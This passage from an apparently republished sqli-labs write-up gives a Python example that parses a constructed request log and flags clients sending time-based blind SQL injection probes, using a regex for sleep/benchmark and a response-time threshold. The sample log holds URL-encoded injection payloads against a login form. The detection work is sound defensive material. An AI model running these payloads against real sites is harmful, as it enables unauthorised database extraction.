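The Less-9/10 and Less-15/16 scripts above work by sending hundreds of requests whose only distinguishing feature is a delay function in one parameter and a response time that tracks the injected condition. The added example below (not part of the original post) shows what that traffic looks like from the server side and how to pick it out of a request log: every log line and the log format itself are constructed for the demo, and the threshold values are assumptions.

```python
"""Server-side view of the time-based blind probing pattern used above.
Added example, not from the original post.  Log format and lines are constructed:
"<time> <client> <method> <path> <response_seconds> <url-encoded parameters>"."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
2019-10-05T18:21:01 192.0.2.10 POST /Less-15/ 0.04 uname=admin%27+and+if+%28+length%28database%28%29%29+%3C+1+%2C+sleep%283%29+%2C+1%29%23&passwd=admin
2019-10-05T18:21:02 192.0.2.10 POST /Less-15/ 0.03 uname=admin%27+and+if+%28+length%28database%28%29%29+%3C+8+%2C+sleep%283%29+%2C+1%29%23&passwd=admin
2019-10-05T18:21:05 192.0.2.10 POST /Less-15/ 3.02 uname=admin%27+and+if+%28+length%28database%28%29%29+%3C+9+%2C+sleep%283%29+%2C+1%29%23&passwd=admin
2019-10-05T18:21:09 192.0.2.10 POST /Less-15/ 3.01 uname=admin%27+and+if+%28ascii+%28substr%28database%28%29%2C+1%2C+1%29%29%3D115%2C+sleep%283%29%2C+1%29%23&passwd=admin
2019-10-05T18:21:10 198.51.100.7 POST /Less-15/ 0.05 uname=admin&passwd=admin
2019-10-05T18:21:11 198.51.100.7 GET /Less-1/?id=1 0.02 id=1
"""

# MySQL delay primitives the scripts rely on; matched after URL decoding
PROBE_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
SLOW_SECONDS = 2.0   # assumed threshold: the scripts inject sleep(2) or sleep(3)


def parse_line(line):
    ts, client, method, path, secs, params = line.split(" ", 5)
    return {"ts": ts, "client": client, "method": method, "path": path,
            "seconds": float(secs), "params": unquote_plus(params)}


def summarize(log_text):
    """Per client: total requests, requests carrying a delay function, and how many
    of those actually came back slow (the condition evaluated true)."""
    stats = defaultdict(lambda: {"total": 0, "probes": 0, "slow_probes": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        s = stats[rec["client"]]
        s["total"] += 1
        if PROBE_RE.search(rec["params"]):
            s["probes"] += 1
            if rec["seconds"] >= SLOW_SECONDS:
                s["slow_probes"] += 1
    return dict(stats)


def flagged_clients(log_text, min_probes=3):
    """Clients that sent at least `min_probes` delay-function requests.  A non-zero
    slow_probes count for such a client means the injected expression was executed."""
    return sorted(c for c, s in summarize(log_text).items() if s["probes"] >= min_probes)


if __name__ == "__main__":
    for client, s in summarize(SAMPLE_LOG).items():
        print(client, s)
    print("flagged:", flagged_clients(SAMPLE_LOG))   # ['192.0.2.10']
```

The keyword match is the cheap part; the response-time column is what separates a scanner that was blocked from one whose `sleep(3)` actually ran, which is the signal to escalate on. Decoding with `unquote_plus` first matters because, as the scripts show, the probe arrives form-encoded.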
";
";
";
Published: 2023-11-05 17:27:44
Article link: https://www.wtabcd.cn/zhishi/a/1699176464207227.html